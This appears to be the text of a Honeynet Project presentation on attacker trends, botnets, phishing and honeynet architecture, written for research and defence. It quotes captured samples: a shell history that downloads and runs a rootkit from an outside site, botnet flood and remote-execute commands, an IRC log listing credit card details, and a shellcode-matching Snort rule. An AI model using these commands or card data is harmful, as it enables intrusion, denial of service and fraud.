Honeynets and The Honeynet Project

2

Speaker

3

Purpose

To explain our organization, our value to you, and our research.

4

Agenda• The Honeynet Project and Research

Alliance• The Threat• How Honeynets Work• Learning More

5

Honeynet Project

6

Problem

How can we defend against an enemy, when we don’t even know who the enemy is?

7

Mission Statement

To learn the tools, tactics, and motives involved in computer and network

attacks, and share the lessons learned.

8

Our Goal Improve security of Internet at no cost to the

public.

• Awareness: Raise awareness of the threats that exist.

• Information: For those already aware, we teach and inform about the threats.

• Research: We give organizations the capabilities to learn more on their own.

9

Honeynet Project• Non-profit (501c3) organization with Board of

Directors.• Funded by sponsors• Global set of diverse skills and experiences.• Open Source, share all of our research and findings at

no cost to the public.• Deploy networks around the world to be hacked.• Everything we capture is happening in the wild.• We have nothing to sell.

10

Honeynet Research Alliance Starting in 2002, the Alliance is a forum of

organizations around the world actively researching, sharing and deploying honeypot technologies.

http://www.honeynet.org/alliance/

11

Alliance Members• South Florida Honeynet Project • Georgia Technical Institute • Azusa Pacific University• USMA Honeynet Project• Pakistan Honeynet Project• Paladion Networks Honeynet Project (India) • Internet Systematics Lab Honeynet Project (Greece)• Honeynet.BR (Brazil)• UK Honeynet• French Honeynet Project• Italian Honeynet Project• Portugal Honeynet Project• German Honeynet Project• Spanish Honeynet Project• Singapore Honeynet Project• China Honeynet Project

12

The Threat

13

What we have captured

• The Honeynet Project has captured primarily external threats that focus on targets of opportunity.

• Little has yet to be captured on advanced threats, few honeynets to date have been designed to capture them.

14

The Threat• Hundreds of scans a day.• Fastest time honeypot manually compromised,

15 minutes (worm, under 60 seconds).• Life expectancies: vulnerable Win32 system is

under three hours, vulnerable Linux system is three months.

• Primarily cyber-crime, focus on Win32 systems and their users.

• Attackers can control thousands of systems (Botnets).

15

The Threat

16

The Motive

• Motives vary, but we are seeing more and more criminally motivated.

• Several years ago, hackers hacked computers. Now, criminals hack computers.

• Fraud, extortion and identity theft have been around for centuries, the net just makes it easier.

17

DDoS for Money

J4ck: why don't you start charging for packet attacks?J4ck: "give me x amount and I'll take bla bla offline for this amount of time”J1LL: it was illegal last I checkedJ4ck: heh, then everything you do is illegal. Why not make money off of it?J4ck: I know plenty of people that'd pay exorbatent amounts for packeting

18

The Target

• The mass users.• Tend to be non-security aware, making

them easy targets.• Economies of scale (it’s a global target).

19

Interesting Trends

• Attacks often originate from economically depressed countries (Romania is an example).

• Attacks shifting from the computer to the user (computers getting harder to hack).

• Attackers continue to get more sophisticated.

20

The Tools

• Attacks used to be primarily worms and autorooters.

• New advances include Botnets and Phishing.

• Tools are constantly advancing.

21

The Old Days

Jan 8 18:48:12 HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TARJan 8 18:48:31 HISTORY: PID=1246 UID=0 yJan 8 18:48:45 HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR Jan 8 18:48:59 HISTORY: PID=1246 UID=0 tar -xzvf LuJan 8 18:49:01 HISTORY: PID=1246 UID=0 tar -xzvf LJan 8 18:49:03 HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR Jan 8 18:49:06 HISTORY: PID=1246 UID=0 cd luckrootJan 8 18:49:13 HISTORY: PID=1246 UID=0 ./luckgo 216 210Jan 8 18:51:07 HISTORY: PID=1246 UID=0 ./luckgo 200 120Jan 8 18:51:43 HISTORY: PID=1246 UID=0 ./luckgo 64 120Jan 8 18:52:00 HISTORY: PID=1246 UID=0 ./luckgo 216 200

22

Botnets

• Large networks of hacked systems.• Often thousands, if not tens of thousands,

of hacked systems under the control of a single user.

• Automated commands used to control the ‘zombies’.

23

How They Work• After successful exploitation, a bot uses TFTP, FTP,

or HTTP to download itself to the compromised host. • The binary is started, and connects to the hard-

coded master IRC server. • Often a dynamic DNS name is provided rather than

a hard coded IP address, so the bot can be easily relocated.

• Using a special crafted nickname like USA|743634 the bot joins the master's channel, sometimes using a password to keep strangers out of the channel

24

80% of traffic

• Port 445/TCP• Port 139/TCP• Port 135/TCP• Port 137/UDP

• Infected systems most often WinXP-SP1 and Win2000

25

Botsddos.synflood [host] [time] [delay] [port]starts an SYN flood

ddos.httpflood [url] [number] [referrer] [recursive = true||false]starts a HTTP flood

scan.listnetrangeslist scanned netranges

scan.startstarts all enabled scanners

scan.stopstops all scanners

http.downloaddownload a file via HTTP

http.executeupdates the bot via the given HTTP URL

http.updateexecutes a file from a given HTTP URL

cvar.set spam_aol_channel [channel]AOL Spam - Channel name

cvar.set spam_aol_enabled [1/0]AOL Spam - Enabled?

26

Numbers

• Over a 4 months period• More then 100 Botnets were tracked• One channel had over 200,000 IP

addresses.• One computer was compromised by 16

Bots.• Estimate over 1 millions systems

compromised.

27

Botnet Economy

• Botnets sold or for rent.• Saw Botnets being stolen from each other.• Observed harvesting of information from

all compromised machines. For example, the operator of the botnet can request a list of CD-keys (e.g. for Windows or games) from all bots. These CD-keys can be sold or used for other purposes since they are considered valuable information.

28

Phishing• Social engineer victims to give up valuable

information (login, password, credit card number, etc).

• Easier to hack the user then the computers.

• Need attacks against instant messaging.

http://www.antiphishing.org

29

The Sting

30

Getting the Info

31

Infrastructure

• Attackers build network of thousands of hacked systems (often botnets).

• Upload pre-made pkgs for Phishing.• Use platforms for sending out spoofed

email.• Use platforms for false websites.

32

A Phishing Rootkit• -rw-r--r-- 1 free web 14834 Jun 17 13:16 ebay only• -rw-r--r-- 1 free web 247127 Jun 14 19:58 emailer2.zip• -rw-r--r-- 1 free web 7517 Jun 11 11:53 html1.zip• -rw-r--r-- 1 free web 10383 Jul 3 19:07 index.html• -rw-r--r-- 1 free web 413 Jul 18 22:09 index.zip• -rw-r--r-- 1 free web 246920 Jun 14 20:38 massmail.tgz• -rw-r--r-- 1 free web 8192 Jun 12 07:18 massmail.zip• -rw-r--r-- 1 free web 12163 Jun 9 01:31 send.php• -rw-r--r-- 1 free web 2094 Jun 20 11:49 sendspamAOL1.tgz• -rw-r--r-- 1 free web 2173 Jun 14 22:58 sendspamBUN1.tgz• -rw-r--r-- 1 free web 2783 Jun 15 00:21 sendspamBUNzip1.zip• -rw-r--r-- 1 free web 2096 Jun 16 18:46 sendspamNEW1.tgz• -rw-r--r-- 1 free web 1574 Jul 11 01:08 sendbank1.tgz• -rw-r--r-- 1 free web 2238 Jul 18 23:07 sendbankNEW.tgz• -rw-r--r-- 1 free web 83862 Jun 9 09:56 spamz.zip• -rw-r--r-- 1 free web 36441 Jul 18 00:52 usNEW.zip• -rw-r--r-- 1 free web 36065 Jul 11 17:04 bank1.tgz• drwxr-xr-x 2 free web 49 Jul 16 12:26 banka• -rw-r--r-- 1 free web 301939 Jun 8 13:17 www1.tar.gz• -rw-r--r-- 1 free web 327380 Jun 7 16:24 www1.zip

33

Credit Cards Exchanging

04:55:16 COCO_JAA: !cc04:55:23 {Chk}: 0,19(0 COCO_JAA 9)0 CC for U :4,1 Bob Johns|P. O. Box126|Wendel, CA 25631|United States|510-863-4884|4407070000588951 06/05 (AllThis ccs update everyday From My Hacked shopping Database - You mustregular come here for got all this ccs) 8*** 9(11 TraDecS Chk_Bot FoR #goldcard9)04:55:42 COCO_JAA: !cclimit 440707000058895104:55:46 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur MasterCard(5407070000788951) : 0.881 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)04:56:55 COCO_JAA: !cardablesite04:57:22 COCO_JAA: !cardable electronics04:57:27 {Chk}: 0,19(0 COCO_JAA 9)0 Site where you can card electronics :*** 9(11 TraDecS Chk_bot FoR #goldcard9)04:58:09 COCO_JAA: !cclimit 423429439113113604:58:12 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur Visa (4264294291131136) :9.697 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)

34

The Future

• Hacking is profitable and difficult to get caught.

• Expect more attacks to focus on the end user or the client.

• Expect things to get worse, bad guys adapt faster.

35

Honeynets

36

Honeypots• A honeypot is an information system resource

whose value lies in unauthorized or illicit use of that resource.

• Has no production value, anything going to or from a honeypot is likely a probe, attack or compromise.

• Primary value to most organizations is information.

37

Advantages

• Collect small data sets of high value.• Reduce false positives• Catch new attacks, false negatives• Work in encrypted or IPv6 environments• Simple concept requiring minimal resources.

38

Disadvantages

• Limited field of view (microscope)• Risk (mainly high-interaction honeypots)

39

Types

• Low-interaction• Emulates services, applications, and OS’s.• Low risk and easy to deploy/maintain, but

capture limited information.

• High-interaction• Real services, applications, and OS’s• Capture extensive information, but high

risk and time intensive to maintain.

40

Examples of Honeypots

• BackOfficer Friendly• KFSensor• Honeyd• Honeynets

Low Interaction

High Interaction

41

Honeynets

• High-interaction honeypot designed to capture in-depth information.

• Information has different value to different organizations.

• Its an architecture you populate with live systems, not a product or software.

• Any traffic entering or leaving is suspect.

42

How it works

A highly controlled network where every packet entering or leaving is monitored, captured, and analyzed.

• Data Control• Data Capture• Data Analysis

http://www.honeynet.org/papers/honeynet/

43

Honeynet Architecture

44

Data Control

• Mitigate risk of honeynet being used to harm non-honeynet systems.

• Count outbound connections.• IPS (Snort-Inline)• Bandwidth Throttling*

45

No Data Control

Internet

No Restrictions

No Restrictions

Honeypot

Honeypot

46

Data Control

Internet

Honeywall

Honeypot

Honeypot

No Restrictions

Connections Limited Packet Scrubbed

47

Snort-Inline

alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named";flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh";

alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named";flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh"; replace:"|0000 E8D7 FFFFFF|/ben/sh";)

48

Data Capture

• Capture all activity at a variety of levels.

• Network activity.• Application activity.• System activity.

49

Sebek

• Hidden kernel module that captures all host activity

• Dumps activity to the network.• Attacker cannot sniff any traffic based on

magic number and dst port.

50

Sebek Architecture

51

Honeywall CDROM

• Attempt to combine all requirements of a Honeywall onto a single, bootable CDROM.

• May, 2003 - Released Eeyore• May, 2005 - Released Roo

52

Eeyore Problems

• OS too minimized, almost crippled. Could not easily add functionality.

• Difficult to modify since LiveCD.• Limited distributed capabilities• No GUI administration• No Data Analysis• No international or SCSI support

53

Roo Honeywall CDROM

• Based on Fedora Core 3• Vastly improved hardware and

international support.• Automated, headless installation• New Walleye interface for web based

administration and data analysis.• Automated system updating.

54

Installation

• Just insert CDROM and boot, it installs to local hard drive.

• After it reboots for the first time, it runs a hardening script based on NIST and CIS security standards.

• Following installation, you get a command prompt and system is ready to configure.

55

First Boot

56

Install

57

Configure

58

3 Methods to Maintain

• Command Line Interface• Dialog Interface• Web GUI (Walleye)

59

Command Line Interface

• Local or SSH access only.• Use the utility hwctl to modify

configurations and restart services.

# hwctl HwTCPRATE=30

60

Dialog Menu

61

Data Administration

62

Data Analysis

• Most critical part, the purpose of a honeynet is to gather information and learn.

• Need a method to analyze all the different elements of information.

• Walleye is the new solution, comes with the CDROM.

63

Walleye

64

Data Analysis

65

Data Analysis Flows

66

Data Analysis Details

67

Processes

68

Files

69

Distributed Capabilities

70

Issues• Require extensive resources to properly

maintain.• Detection and anti-honeynet technologies

have been introduced.• Can be used to attack or harm other non-

Honeynet systems.• Privacy can be a potential issue.

71

Legal Contact for .mil / .govDepartment of Justice; Computer Crime and

Intellectual Property Section.

• Paul Ohm• Number: (202) 514.1026• E-Mail: paul.ohm@usdoj.gov

72

Learning More

73

Our Website• Know Your Enemy papers.• Scan of the Month Challenges• Latest Tools and Technologies

http://www.honeynet.org/

74

Our Book

http://www.honeynet.org/book

75

Sponsoring

YOU?

Advanced Network Management Lab

76

How to Sponsor• Sponsor development of a new tool• Sponsor authorship of a new research

paper.• Sponsor research and development.

• Buy our book

<project@honeynet.org>

http://www.honeynet.org/funds/

77

Conclusion

The Honeynet Project is a non-profit, research organization improving the security of the Internet at no cost to the public by providing tools and information on cyber security threats.

78

http://www.honeynet.org

<project@honeynet.org>